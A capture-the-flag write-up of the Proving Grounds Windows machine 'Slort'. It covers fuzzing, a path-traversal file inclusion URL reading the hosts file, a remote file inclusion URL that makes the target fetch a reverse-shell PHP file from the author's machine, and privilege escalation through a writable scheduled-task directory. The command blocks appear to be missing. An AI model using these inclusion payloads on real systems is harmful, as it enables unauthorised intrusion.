Slort
Last updated
Last updated
Source: Proving Grounds OS: Windows Community Rating: Intermediate
I started as usual with autorecon which exposed: FTP (21), 135, 139, 445, 3306, HTTP (4443), 5040, HTTP (8080), 49664 -> 49669
FTP had no anonymous access so I started with the usual, HTTP. Both HTTP sites were XAMPP’s default page. Access to phpMyAdmin was denied, displaying the message:
I checked the fuzzers but they exposed nothing, and neither SMB nor MySQL provided anything useful. I kept going in circles for a bit until I fuzzed the sites again with a different wordlist:
That’s when "/site/" was exposed. This directory contained a simple PHP page with the URL: http://192.168.213.53:4443/site/index.php?page=main.php
I’m sure if I were in an anime, a light bulb would have appeared with the text "File Inclusion" flashing before my eyes.
I tested the inclusion by visiting: http://192.168.213.53:4443/site/index.php?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts
which worked!
When facing a file inclusion vulnerability, it’s important to check whether it’s Remote File Inclusion (RFI) or only Local File Inclusion. Turns out we have RFI and that was it, we were able to get a shell!
I generated a reverse shell payload with msfvenom:
Then triggered it via the vulnerable parameter: http://192.168.213.53:4443/site/index.php?page=http://192.168.45.170:901/shell.php
Once I was in, I uploaded winPEAS and started checking around. The C drive had a Backup directory, and inside I found a file, info.txt, containing:
This indicated a scheduled service (the Windows equivalent of cron jobs). I decided to see if I had permission over the directory. I performed the following steps:
There we go, we got a shell back as an admin.
Fuzzing with alternative wordlists can reveal hidden directories when initial scans turn up nothing.
File inclusion vulnerabilities can sometimes allow Remote File Inclusion, granting a quick path to a shell.
Scheduled tasks or services that run binaries from writable directories are valuable privilege escalation vectors.